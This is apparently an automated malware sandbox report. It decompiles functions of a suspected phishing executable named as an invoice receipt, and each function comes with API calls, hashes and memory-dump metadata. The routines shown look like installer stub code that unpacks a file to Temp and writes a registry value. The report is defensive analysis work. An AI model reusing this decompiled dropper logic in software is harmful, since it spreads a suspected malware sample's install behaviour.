Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE3, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405ce5
0x00405ced
0x00405d01
0x00405d01
0x00405d07
0x00405d14
0x00405d14
0x00405d15
0x00405d17
0x00405d1b
0x00405d1d
0x00405d26
0x00405d28
0x00405d42
0x00405d4a
0x00405d4a
0x00405d4f
0x00405d51
0x00405d53
0x00405d57
0x00405d58
0x00405d5b
0x00405d63
0x00405d65
0x00405d69
0x00000000
0x00000000
0x00405d6f
0x00405d74
0x00000000
0x00000000
0x00000000
0x00405d74
0x00405d79

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
CharNextA.USER32(?,?,?,00000000), ref: 00405D48
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

Strings

*?|<>/":, xrefs: 00405D2B
"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" , xrefs: 00405CE9
C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1636070977
Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9E, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403eb0
0x00403f44
0x00000000
0x00403f44
0x00403ec1
0x00403ec5
0x00000000
0x00000000
0x00403ecb
0x00403ed4
0x00403ed7
0x00403ed7
0x00403edd
0x00403ee3
0x00403ee3
0x00403eef
0x00403ef5
0x00403efc
0x00403eff
0x00403f02
0x00403f04
0x00403f04
0x00403f0c
0x00403f12
0x00403f12
0x00403f1c
0x00403f21
0x00403f24
0x00403f29
0x00403f2c
0x00403f2c
0x00403f3c
0x00403f3c
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403EBB
GetSysColor.USER32(00000000), ref: 00403ED7
SetTextColor.GDI32(?,00000000), ref: 00403EE3
SetBkMode.GDI32(?,?), ref: 00403EEF
GetSysColor.USER32(?), ref: 00403F02
SetBkColor.GDI32(?,?), ref: 00403F12
DeleteObject.GDI32(?), ref: 00403F2C
CreateBrushIndirect.GDI32(?), ref: 00403F36

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040266e
0x00402670
0x0040267c
0x0040267f
0x00402689
0x0040268d
0x0040268d
0x00402693
0x004026a0
0x004026a8
0x004026ab
0x004026b1
0x004026bf
0x004026c4
0x004026c8
0x004026cb
0x004026d4
0x004026e0
0x004026e4
0x004026e7
0x004026f1
0x00402710
0x004026f8
0x004026fd
0x00402705
0x00402708
0x0040270d
0x0040270d
0x00402717
0x00402717
0x00402729
0x00402730
0x00402742
0x00402742
0x00402748
0x00402748
0x00402753
0x00402754
0x00402758
0x0040275c
0x00402762
0x00402762
0x00402769
0x00402156
0x00402880
0x0040288c

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E23, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404e29
0x00404e35
0x00404e38
0x00404e3e
0x00404e4a
0x00404e4d
0x00404e50
0x00404e56
0x00404e56
0x00404e5c
0x00404e64
0x00404e67
0x00404e84
0x00404e88
0x00404e91
0x00404e91
0x00404e9b
0x00404ea4
0x00404eb0
0x00404eb7
0x00404ebb
0x00404ebe
0x00404ed1
0x00404edf
0x00404edf
0x00404ee3
0x00404ee5
0x00404ee8
0x00000000
0x00404ee8
0x00404e69
0x00404e71
0x00404e79
0x00404e7f
0x00000000
0x00404e7f
0x00404e79
0x00404e67
0x00404ef2

APIs

lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004046F2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404700
0x0040470d
0x00404713
0x00404751
0x00404751
0x00404760
0x00404767
0x00000000
0x00404769
0x00404715
0x00404724
0x0040472c
0x0040472f
0x00404741
0x00404747
0x0040474e
0x00000000
0x0040474e
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
GetMessagePos.USER32 ref: 00404715
ScreenToClient.USER32 ref: 0040472F
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767

Strings

f, xrefs: 00404743

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b6a
0x00402b6f
0x00402b71
0x00402b71
0x00402b7c
0x00402b8c
0x00402b9e
0x00402b9e
0x00402ba6

APIs

SetTimer.USER32 ref: 00402B48
wsprintfA.USER32 ref: 00402B7C
SetWindowTextA.USER32(?,?), ref: 00402B8C
SetDlgItemTextA.USER32 ref: 00402B9E

Strings

verifying installer: %d%%, xrefs: 00402B71
unpacking data: %d%%, xrefs: 00402B6A, 00402B7A

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

0x004022f6
0x004022fb
0x00402305
0x0040230f
0x00402312
0x00402322
0x0040232c
0x00402333
0x0040233b
0x00402349
0x0040234d
0x00402358
0x00402358
0x0040235c
0x00402360
0x00402366
0x0040236b
0x0040236b
0x0040236f
0x0040237b
0x0040237b
0x00402394
0x00402396
0x00402396
0x00402399
0x0040246f
0x0040246f
0x00402880
0x0040288c

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiCC2.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiCC2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiCC2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nsiCC2.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsiCC2.tmp
API String ID: 1356686001-2264810577
Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bd1
0x00402bd3
0x00402bda
0x00402bdd
0x00402bdd
0x00402be3
0x00000000
0x00402be3
0x00402beb
0x00402bf1
0x00000000
0x00402bf4
0x00402bfb
0x00402c01
0x00402c07
0x00402c09
0x00402c0f
0x00402c4d
0x00402c53
0x00000000
0x00402c53
0x00402c11
0x00402c18
0x00402c29
0x00000000
0x00402c37
0x00402c18
0x00402c5a

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
GetTickCount.KERNEL32 ref: 00402BFB
CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D

Part of subcall function 00402BA9: MulDiv.KERNEL32(0003E9C5,00000064,00041253), ref: 00402BBE

wsprintfA.USER32 ref: 00402C29

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
